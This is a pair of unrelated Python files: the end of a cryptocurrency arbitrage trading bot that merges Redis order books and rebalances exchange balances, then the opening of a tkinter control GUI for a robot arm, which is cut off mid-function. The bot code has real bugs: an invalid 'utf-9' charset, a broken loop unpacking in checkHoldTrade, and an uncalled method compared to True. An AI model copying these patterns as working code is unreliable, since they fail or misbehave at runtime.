self.__started = time.time()
# an array of market objects
self.markets = m
# this is the default order for currency
self.currencies = ["ltc", "usd","lsd"]
# Use the pair object to creat an array of the
# best currency markets
# we may need to put the market name/index number
# in the Pair object so that we can later match
# The form that the pair objects in ask/bid will take
# inside this arbitrage object is as follows, and
# note: IS DIFFERENT FROM DEFAULT PAIR.
# [price, quantity, index, marketbalance, marketidx]
self.pairs = []
self.trades = []
for x in range(0,numCur):
self.pairs.append(Pair('arb',x,50,[dq,dq,dq],0))
self.trades.append(Trades('arb',x,50,0))
# Variables to keep track of overall profit / trade
# volume....This will need to be corrected for multiple
# currency pairs as the price/volume is drasticlly different
self.tprofit = D('0')
self.ttrades = []
for x in range(0,numCur):
self.ttrades.append(D('0'))
# Strings for the logger
self.last_arb = ""
self.last_best =""
self.last_string = ""
# This is for our draw screen function
self.screen_update = time.time()
# This sets up the balance sheets for all our currencies
# we use this to tell if we are way off the mark and need
# to buy/sell a currency to bring us back to a flat line
self.market_balances = Balance()
for m in self.markets:
for k,v in m.balances.funds.items():
self.market_balances.funds[k] += v
self.__initial_market_balances = copy.deepcopy(self.market_balances)
# Write out our initial balances to our log file
self.logger(self.stringFormat(0,0,0,2))
# This lets our main loop know if we entered an arb state
# so that we can run checkbooks/etc
self.entered_arb = 0
# This is a counter, to check our books a couple times
# then stop so we don't just check all the time as
# really, unless there is a change in 3-5 minutes
# there shouldnt be any further change
self.arb_counter = 0
#
# This is the discrepancy from the base balance we
# are off in each market - should use to adjust order
# trades in the future
#
# This is either + or - from the base
# + means we should sell more (or buy less)
# - means we should buy more (or sell less)
#
self.discrep = { 'usd': D('0'),
'ltc': D('0'),
'btc': D('0')
}
###################################
#
# Orderbook getting section
#
#
# This is the main function which gets all the orderbook data
# from the redis server.
# layout is as follows:
# get key from redis which signals markets updated
# get all the data from redis ->
# process data into each market.pair
# build master order book for each pair
# done
# return true if an update, false if no update
#
#
#
#
def buildBooks(self, loc, initial = 0):
global perf_list
perf_start = time.perf_counter()
while True:
try:
#perf_start = time.perf_counter()
pid = self.pairs[loc]
tempd = {}
r_server = redis.Redis(connection_pool=r_pool, charset="utf-9", decode_responses=True)
r_pipe = r_server.pipeline()
if initial == 1:
zunion_flag = 1
else:
zunion_flag = 0
for idx, mkt in enumerate(self.markets):
# due to old structure, we must make a temp dict to store
# data used for algos, namely the pos, mkt balance, and mkt idx
mktb = mkt.balances.getAvail(self.currencies[loc])
# and the markets current btc balance
mktbtc = mkt.balances.getAvail(UNDERLYING[loc])
tempd[mkt.mname] = {'idx' : idx, 'posa':0, 'posb':0,'mktbtc':mktbtc, 'mktb':mktb, 'min_q':MIN_COIN}
# this is seeing if an update passed since last time
# we qeue up responses no matter what and will just
# skip the 0's later
if mkt.pairs[loc] != 0:
r_pipe.zrange(mkt.mname + ":" + self.currencies[loc] +":ask",0,25)
r_pipe.zrevrange(mkt.mname + ":" + self.currencies[loc] +":bid",0,25)
zunion_flag = 1
if initial == 1:
tempd[mkt.mname]['min_q'] = MIN_COIN
else:
try:
tempd[mkt.mname]['min_q'] = mkt.pairs[loc].min_trade_quantity()
except:
tempd[mkt.mname]['min_q'] = MIN_COIN
else:
r_pipe.echo('0')
r_pipe.echo('0')
if zunion_flag == 1:
# Need a better solution for this
if UNDERLYING[loc] == 'usd':
ztempa = [x.mname + ":" + self.currencies[loc] + ":ask" for x in self.markets if tempd[x.mname]['mktbtc'] > D('1') ]
else:
ztempa = [x.mname + ":" + self.currencies[loc] + ":ask" for x in self.markets if tempd[x.mname]['mktbtc'] > MIN_BTC ]
ztempb = [x.mname + ":" + self.currencies[loc] + ":bid" for x in self.markets if tempd[x.mname]['mktb'] > tempd[x.mname]['min_q'] ]
if ztempa:
r_pipe.zunionstore("ob:"+self.currencies[loc]+":ask", ztempa)
if ztempb:
r_pipe.zunionstore("ob:"+self.currencies[loc]+":bid", ztempb)
r_pipe.zrange("ob:"+self.currencies[loc]+":ask" ,0,100)
r_pipe.zrevrange("ob:"+self.currencies[loc]+":bid",0,100)
else:
r_pipe.echo('0')
r_pipe.echo('0')
r_pipe.echo('0')
r_pipe.echo('0')
#perf_start = time.perf_counter()
# so this will be a list as [[mkt1 ask's], [mkt1 bids], 0, 0, [mkt3 asks], ..., [zunion asks], [zunion bids]]
resp = r_pipe.execute()
#perf_end = time.perf_counter()
#
# from top to here,
# this section is ~~.0028s
#
#
#perf_start = time.perf_counter()
# now parse the data
# first reparse each individal markets pairs
i = 0
for idx, mkt in enumerate(self.markets):
if resp[i] == '0':
i +=2
continue
else:
with lock:
mkt.getBook(loc, [resp[i], resp[i+1]],time.time())
i+=2
#
# time here must be roughly ~~.002s
#
# now main book
if resp[-1] != '0':
# due to other places using this we need to lock here (eg: window thread calls this and
# if these are deleted during update we will crash)
perf_start = time.perf_counter()
with lock:
#[fee_price, quantity, pos, mkt balance, mkt idx, timer]
pid.asks = []
for x in resp[-2]:
order = x.split(":")
mktb = tempd[order[3]]['mktb']
idx = tempd[order[3]]['idx']
pos = tempd[order[3]]['posa']
tempd[order[3]]['posa'] += 1
if D(order[1]) < tempd[order[3]]['min_q']:
ignore,b = mkt.NullPrice()
order[1] = b[1]
order[2] = b[0]
else:
pid.asks.append([D(order[2]), D(order[1]),pos,mktb,idx,float(order[4])])
pid.bids = []
for x in resp[-1]:
order = x.split(":")
mktb = tempd[order[3]]['mktb']
idx = tempd[order[3]]['idx']
pos = tempd[order[3]]['posb']
tempd[order[3]]['posb'] += 1
if D(order[1]) < tempd[order[3]]['min_q']:
ignore,b = mkt.NullPrice()
order[1] = b[1]
order[2] = b[0]
else:
pid.bids.append([D(order[2]), D(order[1]),pos,mktb,idx,float(order[4])])
perf_end = time.perf_counter()
perf_list.append(perf_end - perf_start)
#
# sub block time is ~~.002s
#
#
# This block from after r_pipe.execute
# is ~~.004s
#
#
time.sleep(.01)
if initial == 1:
break
except:
logger.exception("main arb build books")
time.sleep(5)
# Stub allows us to thread this function to allow quicker
# execution
def skewStub(self, x):
if x.mname == 'BTCe' or x.mname == 'gdax' or x.mname == 'kraken' or x.mname == 'gemini':
x.skew_order = 1
x.skew_cancel = 1
else:
result = x.calcSkew(0)
if result != True:
if result == -2:
x.skew_order = x.trade_lag
x.skew_cancel = x.trade_lag
else:
try:
x.cancelAllOrder()
except:
pass
# This is a threaded subfunction which looks at each market and
# sees if we need to canceltrades/update orderbook.
#
# The rules are as follows:
# if need_update = 0 nothing is needed
#
# if need_update = 1 means trade succeded and we update books
# if hold trade, most likely something failed so we don't go until
# everything is checked.
def setMarketBooks(self):
if self.entered_arb != 1:
if self.arb_counter > 0:
self.arb_counter -= 1
prior = threading.active_count()
p_timeout = time.time()
for m in self.markets:
t = threading.Thread(target = m.setBalance)
t.start()
while (threading.active_count() > prior) and (time.time() - 60 < p_timeout):
time.sleep(1)
# So arb has happened, we should set the counter to 3, then
# continue with normal getting of balances.
else:
# Set to default of 4, so we check books four times,
# then we should be good.
self.arb_counter = 6
for m in self.markets:
m.setBalance()
self.sumBooks()
self.logger(self.stringFormat(0,0,0,2))
# This is going to process our initial book versus our current book
# If it is way out of wack it will call fixBook which will initiate
# a trade to correct the imbalance.
def checkBooks(self):
# First we ensure that all books are up to date
# this also means that none should be held
for m in self.markets:
if m.need_update >= m.hold_trade > 0:
return False
cur_book = self.market_balances
initial_b = self.__initial_market_balances
for k,v in cur_book.funds.items():
# we don't want to balance btc at all
if k == 'btc':
continue
# create the absolute average difference
avg = (cur_book.funds[k] + initial_b.funds[k]) / 2
difference = cur_book.funds[k] - initial_b.funds[k]
if avg != 0:
abs_d = abs(difference / avg)
else:
abs_d = 0
# This implies that we are .06% off the starting values in
# the coins so either we are ahead or behind.
# either way we should try to come back to the
# initial balance and take profit or eat loss
if abs_d > .001:
# min quantity on most markets is .01, so we cant correct here
if k == 'usd' and abs(difference) < 6:
continue
# so we are going to buy or sell based on the diference
self.logger("market needs to be fixed....{0}, {1}".format(k, difference))
# dont want to make use of discrep here, so null it out
self.getDiscrep(k)
self.fixBook(k, difference)
# Since there was actually a market change we should reprint the balance
# ticker tape.
self.sumBooks()
self.logger(self.stringFormat(0,0,0,2))
# Since everything is now "fixed" we can set this to
# 0 so we don't keep calling it
self.entered_arb = 0
return True
# This method fixes our orderbook by doing a one way trade
def fixBook(self, coin, diff):
try:
for indexr,k in enumerate(self.currencies):
if coin == k:
pid = self.pairs[indexr]
loc = indexr
break
# get the discrep
discrep = self.getDiscrep(coin)
# This means we need to buy the currency
if diff < 0:
top = pid.asks
bysl = "ask"
else:
top = pid.bids
bysl = "bid"
quant = abs(diff + discrep)
i = 0
counter = 0
while quant > 0 and i+3 < len(top) and counter < 10:
h = top[i]
mkt = self.markets[h[4]]
# So three possible iterations, we may get caught in a loop of low values
if counter > 3 or i > 6:
if quant < .01:
# start lowering the amount of quant
quant -= D(i) * D('.001')
# we don't trade this pair on this exchange
if mkt.pairs[loc] == 0:
i += 1
continue
# we shouldnt be here if we have a hold
if mkt.hold_trade == 1:
i += 1
continue
with lock:
try:
if bysl == "ask":
order = mkt.pairs[loc].getA(h[2])
else:
order = mkt.pairs[loc].getB(h[2])
except IndexError:
return
min_quant = min(quant,order[1])
if not mkt.calcBalance(loc, coin,order[0],min_quant,bysl):
i += 1
continue
if mkt.pairs[loc].min_trade_quantity() > min_quant:
i += 1
continue
opts = { 'loc' : loc,
'side': bysl,
'price':order[0],
'quantity':min_quant,
'ioc': True
}
# try not locking this section
temp_q = mkt.postTrade(opts)
if temp_q != -1:
quant -= temp_q
mkt.quickBalances(loc,[mkt,bysl,order,temp_q])
i = 0
counter += 1
except:
logger.exception("in fixbook")
# This adds up all the books into our one marketsheet
def sumBooks(self):
for k,v in self.market_balances.funds.items():
self.market_balances.funds[k] = 0
for m in self.markets:
self.market_balances.funds[k] += m.balances.getCurrency(k)
# checks if a market is held, if so return True
def checkHoldTrade(self):
for i,m in self.markets:
if m.hold_trade == 1:
return True
return False
# Creates custom strings for use in keeping track of arbs and
# also for writing out to logs.
def stringFormat(self, ask, bid, pairn, arb=0, p=D('0') , q=D('0') ):
ds = D('.00000001')
if arb == 1:
return "M:{6} [{0}:{1} a], [{2}:{3} b]ARB: Q:{4} P:{5}".format(
ask[0].quantize(ds), # price
self.markets[ask[4]].mname, # market
bid[0].quantize(ds),
self.markets[bid[4]].mname,
q.quantize(ds),
p, pairn
)
elif arb == 2:
return "BAL: BTC: {0}, LTC: {2}, USD : {1}".format(
self.market_balances.getCurrency('btc').normalize(),
self.market_balances.getCurrency('usd').normalize(),
self.market_balances.getCurrency('ltc').normalize()
)
else:
return 'M:{4} [{0}:{1} a], [{2}:{3} b]'.format(
ask[0].normalize(),
self.markets[ask[4]].mname,
bid[0].normalize(),
self.markets[bid[4]].mname,
pairn
)
# writes logs of everything
def logger(self,strg):
# just to prevent spamming the arb
if self.last_string == strg:
return
else:
filename = "logs/" + "arb.logs"
f = open(filename,'a')
t = "T: {0} {1} \n".format(int(time.time()), strg)
f.write(t)
f.close()
self.last_string = strg
# Gets the amount we are off in each coin value
# if we are getting this, we assume that we are
# placing a trade, so nulls the value out on the
# discrep value
def getDiscrep(self, coin = 'ltc'):
d = self.discrep[coin]
self.discrep[coin] = D('0')
return d
def setDiscrep(self):
cur_book = self.market_balances
initial_b = self.__initial_market_balances
for k,v in cur_book.funds.items():
if k == 'btc':
continue
else:
self.discrep[k] = cur_book.funds[k] - initial_b.funds[k]
# Just returns the difference from current balance - initial
def coinBal(self, coin = 'btc'):
bal = self.market_balances.getCurrency(coin) - self.__initial_market_balances.getCurrency(coin)
return bal
# Returns the initial balances
def getIBal(self, coin = 'btc'):
return self.__initial_market_balances.getCurrency(coin)
# Here is the actual running program
# Screen loop for a thread
def screenLoop(screen, arb, makr, vana, wind):
global var, scrd
while var == 1:
# This will drop our CPU usage down a bit...
time.sleep(.1)
c = screen.getch()
if c != -1:
for x in ['0','1', '2']:
if c == ord(x):
scrd = int(x)
if c == ord('q'):
var = 0
return
if c == ord('b'):
scrd = 'b'
if c == ord('t'):
scrd = 't'
if c == ord('y'):
scrd = 'y'
if c == ord('m'):
scrd = 'm'
if c == ord('o'):
scrd = 'o'
lock.acquire()
try:
if scrd == 'b':
wind.drawBalances(screen,arb)
elif scrd == 'm':
wind.drawMarket(screen,1,arb,makr)
elif scrd == 't':
wind.drawTriangle(screen,arb,0)
elif scrd == 'y':
wind.drawTriangle(screen,arb,1)
elif scrd == 'o':
wind.drawOrders(screen,makr)
else:
wind.drawScreen(screen,scrd,arb,vana)
except:
logger.exception("in window")
pass
finally:
lock.release()
# GLOBAL VARIABLES
scrd = 0
var = 1
def main(screen):
markets = [gemini(), gdax()]
book = Book(markets,3)
vana = vanilla()
wind = window()
screen.nodelay(1)
global var
booktime = time.time()
skew_time = time.time() - 570
alive_check = time.time()
alive_reset = time.time()
# arb.getTrades(0)
# arb.getTrades(1)
book.buildBooks(0,1)
book.buildBooks(1,1)
book.buildBooks(2,1)
b0 = threading.Thread(target = book.buildBooks, args = (0,))
b0.daemon = True
b0.start()
b1 = threading.Thread(target = book.buildBooks, args = (1,))
b1.daemon = True
b1.start()
b2 = threading.Thread(target = book.buildBooks, args = (2,))
b2.daemon = True
b2.start()
t = threading.Thread(target = screenLoop, args = (screen,book,makr,vana,wind,))
t.daemon = True
t.start()
base_t = threading.active_count()
for x in book.markets:
x.cancelAllOrder()
while var == 1:
# There is a chance that actually viable crossing might
# be taken out by delayed retirevals of orderbooks.
# so we wait for that to finish, then check and
# see if any crossings took place.
if threading.active_count() == base_t:
try:
time.sleep(1)
vana.checkArb(1,book)
vana.checkArb(0,book)
#vana.checkArb(2,book)
except:
logger.exception('in vana.checkarb')
pass
if book.entered_arb == 1 or book.checkHoldTrade == True or(((time.time() - booktime) > 60) and (book.arb_counter > 0)) or ((time.time() - booktime) > 600):
# we don't want to spam if we are in a loop
if (time.time() - booktime) < 15:
pass
else:
book.setMarketBooks()
# We might run into a condition where our threaded setBalance
# doesn't complete and update the prior, "fixed" books so we
# double down and repeat the last correction.
# We will now just update the screen until the prior
# threads finish, and continue with checking
book.sumBooks()
book.checkBooks()
# just to make sure we are no longer looping here
book.entered_arb=0
booktime = time.time()
# set the discrep values, our book should be updated as
# best as possible at this point so anything extra should
# be added here
book.setDiscrep()
# We need to make sure we are not somehow bleeding out money while
# away, so this just checks if our BTC balance has lost -.02 which is
# the limit to an unaccetpable amount. That is literally a huge
# amount at thisp point in time.
if book.coinBal() < D('-.01'):
book.logger('exit from bal < -.01 {} '.format(book.coinBal()))
var = 0
# Check skew every 10 minutes
if skew_time + 600 < time.time():
prior = threading.active_count()
p_timeout = time.time()
for x in book.markets:
t = threading.Thread(target = book.skewStub, args = (x,))
t.start()
while (threading.active_count() > prior) and (time.time() - 60 < p_timeout):
time.sleep(1)
skew_time = time.time()
# check exchange health every minute
if time.time() - alive_check > 60:
for x in book.markets:
if x.checkHealth() is False:
book.logger('{} returned bad health'.format(x.mname))
alive_check = time.time()
time.sleep(.5)
if time.time() - alive_reset > 1800:
for x in book.markets:
x.fixHealth()
time.sleep(10)
alive_reset = time.time()
book.logger(book.stringFormat(0,0,0,2))
for x in book.markets:
x.cancelAllOrder()
if __name__ == '__main__':
curses.wrapper(main)
|
Multi_proc_main.py
|
import matplotlib
import matplotlib.pyplot as plt
import tkinter as tk
from tkinter.ttk import Progressbar
from tkinter import filedialog
from PIL import Image, ImageTk
import multiprocessing
import serial as sr
import time
import random
import numpy as np
import get_send_data as gt
import os,os.path
import axes_robot as rbt
import roboticstoolbox as rp
#from spatialmath import *
import plot_graph_2 as plots
Image_path = os.path.realpath(os.path.join(os.getcwd(), os.path.dirname(__file__)))
print(Image_path)
current_frame = 0 # tells us what frame is active. Move, log, teach...
acc_set = 45 #preset to some value these are % from main to max acc
spd_set = 25 #preset to some value these are % from main to max speed
Enable_disable = False # True is for operating / False is for Stoped
gravity_disable_var = True # True is for gravity comp mode / False is for disabled
Execute_stop_var = True # True is for stop / False is for execute
Now_open = ''
robot_arm = rp.models.DH.CM6()
# p1 = Speed_setpoint
# p2 = acc_setpoint
# p3 = translations
# p4 = left_btns
# p5 = right_btns
# p6 = motor_positions(encoder_ticks)
# p7 = Real RAD angle
# p8 = Current
# p9 = Temperature
# p10 = Robot_pose
# p11 = grav_pos_flag
# p12 = software_control_variables
# p13 = Steer_K1
# p14 = Steer_K2
# p15 = Steer_K3
# p16 = Steer_K4
def Tkinter_GUI(p1,p2,p3,p4,p5,p6,p7,p8,p9,p10,p11,p12,p13,p14,p15,p16):
# When button is pressed raise selected frame
def raise_frame(frame,button1,button2,button3,button4,name):
global current_frame
current_frame = name
if name == 'move':
p12[1] = 0
if name == 'log':
p12[1] = 1
if name == 'teach':
p12[1] = 2
if name == 'setup':
p12[1] = 3
# https://www.tutorialspoint.com/python/tk_relief.htm
button1.config(relief='sunken',bg = main_color) #,borderwidth=3
button2.config(relief='raised',bg = "white")
button3.config(relief='raised',bg = "white")
button4.config(relief='raised',bg = "white")
frame.tkraise()
def move_frame_stuff():
################ Speed and acceleration setup canvas #########
# This segment creates speed and acceleration controls
# They are adjusted by % and shown in RPM and RAD/S² for single joint movement
# and in m/s and m/s² for translation movements
speed_canvas = tk.Canvas(move_frame, width=1400, height=80,bg = "white",borderwidth=6, relief='ridge')
speed_canvas.place(x = 0, y = 0)
# This is used to show how fast roboto will move when performing translational motion or rotation around its axes
speed_label = tk.Label(move_frame, text="Speed settings" ,font = (letter_font,18),bg = "white")
speed_label.place(x = 10, y = 10)
set_speed_RPM = tk.Label(move_frame, text="####" ,font = (letter_font,14),bg = "white")
set_speed_RPM .place(x = 500, y = 10)
set_speed_RAD = tk.Label(move_frame, text="####" ,font = (letter_font,14),bg = "white")
set_speed_RAD .place(x = 500, y = 35)
set_ACC_RAD = tk.Label(move_frame, text="####" ,font = (letter_font,14),bg = "white")
set_ACC_RAD .place(x = 500, y = 60)
# Set speed and acceleration when pressing buttons
def speed_acc_setup(var):
if var == 0:
p1.value = 25 # p1 is speed
p2.value = 40
elif var == 1:
p1.value = 50
p2.value = 50
elif var == 2:
p1.value = 80
p2.value = 55
# Ovo će biti za translacije i rotacije
#set_speed_RPM.configure(text = str(p1.value) + " RPM")
#set_speed_RAD.configure(text = str(p1.value) + " RAD/S")
#set_ACC_RAD.configure(text = str(p2.value) + " RAD/S²")
# This updates values for current desired speed and acceleration in GUI
for y in range(0,rbt.Joint_num):
btns_rads[y].configure(text = "Speed: " + str(round(np.interp(p1.value,[1,100],[rbt.Joint_min_speed[y],rbt.Joint_max_speed[y]]),4)) + " RAD/S")
btns_accel[y].configure(text = "Acceleration: " + str(round(np.interp(p2.value,[1,100],[rbt.Joint_min_acc[y],rbt.Joint_max_acc[y]]),4)) + " RAD/S²")
# Set Speed and acc with sliders
def set_speed_acc():
p1.value = spd_set # speed
p2.value = acc_set # acceleration
# This updates values for current desired speed and acceleration in GUI
for y in range(0,rbt.Joint_num):
btns_rads[y].configure(text = "Speed: " + str(round(np.interp(p1.value,[1,100],[rbt.Joint_min_speed[y],rbt.Joint_max_speed[y]]),4)) + " RAD/S")
btns_accel[y].configure(text = "Acceleration: " + str(round(np.interp(p2.value,[1,100],[rbt.Joint_min_acc[y],rbt.Joint_max_acc[y]]),4)) + " RAD/S²")
# Ovo će biti za translacije i rotacije
#set_speed_RPM.configure(text = str(round(rbt.RADS2_true_RPM(var_),4)) + " RPM")
#set_speed_RAD.configure(text = str(round(var_,4)) + " RAD/S")
#set_ACC_RAD.configure(text = str(round(var2_,4)) + " RAD/S²")
# Button for slow speed
spd_b_1 = tk.Button(move_frame, text = "Slow",bg = "white", font = (letter_font,18), width = 10, height = 1,borderwidth=3,command = lambda:speed_acc_setup(0))
spd_b_1.place(x = 195-180, y = 40)
# Button for default speed
spd_b_2 = tk.Button(move_frame, text = "Default",bg = "white", font = (letter_font,18), width = 10, height = 1,borderwidth=3,command = lambda:speed_acc_setup(1))
spd_b_2.place(x = 345-180, y = 40)
# Button for fast speed
spd_b_2 = tk.Button(move_frame, text = "Fast",bg = "white", font = (letter_font,18), width = 10, height = 1,borderwidth=3,command = lambda:speed_acc_setup(2))
spd_b_2.place(x = 495-180, y = 40)
# Button to set speed from sliders
set_btn = tk.Button(move_frame, text = "Set",bg = "white", font = (letter_font,18), width = 3, height = 1,borderwidth=3,command = lambda:set_speed_acc())
set_btn.place(x = 1320, y = 25)
################ Motor jog canvas ############################
jog_motors_canvas = tk.Canvas(move_frame, width=700, height=800,bg = "white",borderwidth=6, relief='ridge')
jog_motors_canvas.place(x = 0, y = 100)
btns_left = []
btns_right = []
btns_label = []
btns_rads = []
btns_accel = []
btn_nr = -1
global tk_left
image_left = Image.open(os.path.join(Image_path,'blue_arrow_left.png'))
tk_left = ImageTk.PhotoImage(image_left)
global tk_right
image_right = Image.open(os.path.join(Image_path,'blue_arrow_right.png'))
tk_right = ImageTk.PhotoImage(image_right)
robot_names = ['Base', 'Shoulder', 'Elbow', 'Wrist 1', 'Wrist 2', 'Wrist 3']
def button_press_left(event=None, var = 0):
p4[var] = 1
def button_rel_left(event=None, var = 0):
p4[var] = 0
def button_press_right(event=None, var = 0):
p5[var] = 1
def button_rel_right(event=None, var = 0):
p5[var] = 0
# https://stackoverflow.com/questions/14259072/tkinter-bind-function-with-variable-in-a-loop
for y in range(1,7):
btn_nr += 1
def make_lambda1(x):
return lambda ev:button_press_left(ev,x)
def make_lambda2(x):
return lambda ev:button_rel_left(ev,x)
def make_lambda3(x):
return lambda ev:button_press_right(ev,x)
def make_lambda4(x):
return lambda ev:button_rel_right(ev,x)
# Create buttons for joging motors and labels for speed and acceleration
btns_label.append(tk.Label(move_frame, text=robot_names[btn_nr] ,font = (letter_font,16),bg = "white"))
btns_label[btn_nr].place(x = 17, y = 130+btn_nr*140)
btns_left.append(tk.Button(move_frame,image = tk_left,bg ="white",highlightthickness = 0,borderwidth=0))
btns_left[btn_nr].place(x = 150, y = 118+btn_nr*135)
btns_left[btn_nr].bind('<ButtonPress-1>',make_lambda1(btn_nr))
btns_left[btn_nr].bind('<ButtonRelease-1>',make_lambda2(btn_nr))
btns_right.append(tk.Button(move_frame,image = tk_right,bg ="white",highlightthickness = 0,borderwidth=0))
btns_right[btn_nr].place(x = 610, y = 118+btn_nr*135)
btns_right[btn_nr].bind('<ButtonPress-1>',make_lambda3(btn_nr))
btns_right[btn_nr].bind('<ButtonRelease-1>',make_lambda4(btn_nr))
btns_rads.append(tk.Label(move_frame, text= "Speed: " ,font = (letter_font,8,'bold'),bg = "white"))
btns_rads[btn_nr].place(x = 17, y = 165+btn_nr*140)
btns_accel.append(tk.Label(move_frame, text= "Acceleration: " ,font = (letter_font,8,'bold'),bg = "white"))
btns_accel[btn_nr].place(x = 17, y = 188+btn_nr*140)
set_speed_acc()
################ Translation canvas ##########################
jog_pose_canvas = tk.Canvas(move_frame, width=680, height=800,bg = "white",highlightthickness = 0,borderwidth=6, relief='ridge')
jog_pose_canvas.place(x = 720, y = 100)
global tk_xu
global tk_xd
global tk_yl
global tk_yr
global tk_zu
global tk_zd
ylevo = Image.open(os.path.join(Image_path,'ylevo.png'))
tk_yl = ImageTk.PhotoImage(ylevo)
ydesno = Image.open(os.path.join(Image_path,'ydesno.png'))
tk_yr = ImageTk.PhotoImage(ydesno)
xgore = Image.open(os.path.join(Image_path,'xgore.png'))
tk_xu = ImageTk.PhotoImage(xgore)
xdole = Image.open(os.path.join(Image_path,'xdole.png'))
tk_xd = ImageTk.PhotoImage(xdole)
zgore = Image.open(os.path.join(Image_path,'zgore.png'))
tk_zu = ImageTk.PhotoImage(zgore)
zdole = Image.open(os.path.join(Image_path,'zdole.png'))
tk_zd = ImageTk.PhotoImage(zdole)
translation_position = []
def translation_press(event=None,ax=0):
p3[ax] = 1
def translation_release(event=None,ax=0):
p3[ax] = 0
def make_lambda_press(x):
return lambda ev:translation_press(ev,x)
def make_lambda_release(x):
return lambda ev:translation_release(ev,x)
zu_button = tk.Button(move_frame, image=tk_zu,borderwidth=0,highlightthickness = 0,bg = 'white')
zu_button.place(x = 1160, y = 180-60)
zu_button.bind('<ButtonPress-1>',make_lambda_press(5))
zu_button.bind('<ButtonRelease-1>', make_lambda_release(5))
zd_button = tk.Button(move_frame, image=tk_zd,borderwidth=0,highlightthickness = 0,bg = 'white')
zd_button.place(x = 810, y = 180-60)
zd_button.bind('<ButtonPress-1>',make_lambda_press(4))
zd_button.bind('<ButtonRelease-1>', make_lambda_release(4))
yl_button = tk.Button(move_frame, image=tk_yl,borderwidth=0,highlightthickness = 0,bg = 'white')
yl_button.place(x = 810, y = 440-140)
yl_button.bind('<ButtonPress-1>',make_lambda_press(3))
yl_button.bind('<ButtonRelease-1>', make_lambda_release(3))
yr_button = tk.Button(move_frame, image=tk_yr,borderwidth=0,highlightthickness = 0,bg = 'white')
yr_button.place(x = 1160, y = 440-140)
yr_button.bind('<ButtonPress-1>',make_lambda_press(2))
yr_button.bind('<ButtonRelease-1>', make_lambda_release(2))
xu_button = tk.Button(move_frame, image=tk_xu,borderwidth=0,highlightthickness = 0,bg = 'white')
xu_button.place(x = 1090-100, y = 400-140)
xu_button.bind('<ButtonPress-1>',make_lambda_press(1))
xu_button.bind('<ButtonRelease-1>', make_lambda_release(1))
xd_button = tk.Button(move_frame, image=tk_xd,borderwidth=0,highlightthickness = 0,bg = 'white')
xd_button.place(x = 1060-100, y = 600-140)
xd_button.bind('<ButtonPress-1>',make_lambda_press(0))
xd_button.bind('<ButtonRelease-1>', make_lambda_release(0))
##############################################################
def log_frame_stuff():
# Here write code for log frame
None
def teach_frame_stuff():
gravity_hold_canvas_left = tk.Canvas(teach_frame, width=275, height=900,bg = "white",borderwidth=6, relief='ridge')
gravity_hold_canvas_left.place(x = 0, y = 0)
gravity_hold_canvas_right = tk.Canvas(teach_frame, width=275, height=900,bg = "white",borderwidth=6, relief='ridge')
gravity_hold_canvas_right.place(x = 290, y = 0)
save_canvas = tk.Canvas(teach_frame, width=550, height=280,bg = "white",borderwidth=6, relief='ridge')
save_canvas.place(x = 855, y = 620)
control_canvas_teach = tk.Canvas(teach_frame, width=265, height=900,bg = "white",borderwidth=6, relief='ridge')
control_canvas_teach.place(x = 580, y = 0)
gravity_l = tk.Label(teach_frame, text="Gravity compensation" ,font = (letter_font,17),bg = "white")
gravity_l.place(x = 20, y = 10)
position_l = tk.Label(teach_frame, text="Position hold" ,font = (letter_font,17),bg = "white")
position_l.place(x = 310, y = 10)
def open_txt():
global Now_open
mytext.delete('1.0', tk.END)
text_file = filedialog.askopenfilename(initialdir = Image_path + "/Programs",title = "open text file", filetypes = (("Text Files","*.txt"),))
print(text_file)
Now_open = text_file
text_file = open(text_file, 'r+')
stuff = text_file.read()
mytext.insert(tk.END,stuff)
text_file.close()
def save_txt():
global Now_open
print(Now_open)
if Now_open != '':
print("done")
text_file = open(Now_open,'w+')
text_file.write(mytext.get(1.0,tk.END))
text_file.close()
else:
Now_open = Image_path + "/Programs/execute_script.txt"
text_file = open(Now_open,'w+')
text_file.write(mytext.get(1.0,tk.END))
text_file.close()
def save_as_txt():
var1 = entry_label.get()
text_file = open(Image_path + "/Programs/" + var1 +".txt",'w+')
text_file.write(mytext.get(1.0,tk.END))
text_file.close()
def record_position(mode_var):
if entry_label_duration.get() == '':
move_duration = str(4)
else:
move_duration = entry_label_duration.get()
string = mode_var + ',' #'pos,'
string = string + move_duration + ','
for y in range(0,rbt.Joint_num - 1):
string = string + str(round(p7[y],5)) + ','
string = string + str(round(p7[rbt.Joint_num-1],5)) #add last joint without "," at the end
string = string + ',\n'
mytext.insert(tk.INSERT,string)
def record_delay():
if entry_label_delay.get() == '':
delay_time = 1.5
else:
delay_time = entry_label_delay.get()
mytext.insert(tk.INSERT,'delay,')
mytext.insert(tk.INSERT,str(delay_time))
mytext.insert(tk.INSERT,',\n')
p12[3] = 0
def execute_stuff():
global Now_open
data2save = mytext.get(1.0,tk.END)
p12[3] = 1
if Now_open != '':
text_file = open(Now_open,'w+')
text_file.write(data2save)
text_file.close()
text_file = open(Image_path + "/Programs/execute_script.txt",'w+')
text_file.write(data2save)
text_file.close()
else:
Now_open = Image_path + "/Programs/execute_script.txt"
text_file = open(Now_open,'w+')
text_file.write(data2save)
text_file.close()
def stop_execution():
p12[3] = 0
def pause_execution():
p12[3] = 2
mytext = tk.Text(teach_frame,width = 55, height = 30, font=("Helvetica", 13), bg ='gray')
mytext.place(x = 860, y = 10)
execute_button = tk.Button(teach_frame,text = "Execute",font = (letter_font,22), width = 7, height = 1,bg ="ivory3",highlightthickness = 0,borderwidth=3, command = execute_stuff)
execute_button.place(x = 1250, y = 630)
stop_execution_button = tk.Button(teach_frame,text = "Stop",font = (letter_font,22), width = 7, height = 1,bg ="ivory3",highlightthickness = 0,borderwidth=3, command = stop_execution)
stop_execution_button.place(x = 1250, y = 685)
pause_execution_button = tk.Button(teach_frame,text = "Pause",font = (letter_font,22), width = 7, height = 1,bg ="ivory3",highlightthickness = 0,borderwidth=3, command = pause_execution)
pause_execution_button.place(x = 1250, y = 740)
open_button = tk.Button(teach_frame,text = "Open",font = (letter_font,22), width = 7, height = 1,bg ="ivory3",highlightthickness = 0,borderwidth=3,command = open_txt)
open_button.place(x = 1085, y = 630)
save_button = tk.Button(teach_frame,text = "Save",font = (letter_font,14,'bold'), width = 6, height = 1,bg ="ivory3",highlightthickness = 0,borderwidth=3,command = save_txt)
save_button.place(x = 865, y = 630)
save_as_button = tk.Button(teach_frame,text = "Save as",font = (letter_font,14,'bold'), width = 6, height = 1,bg ="ivory3",highlightthickness = 0,borderwidth=3,command = save_as_txt)
save_as_button.place(x = 975, y = 630)
p12[4] = 0
def Start_recording():
if p12[4] == 0:
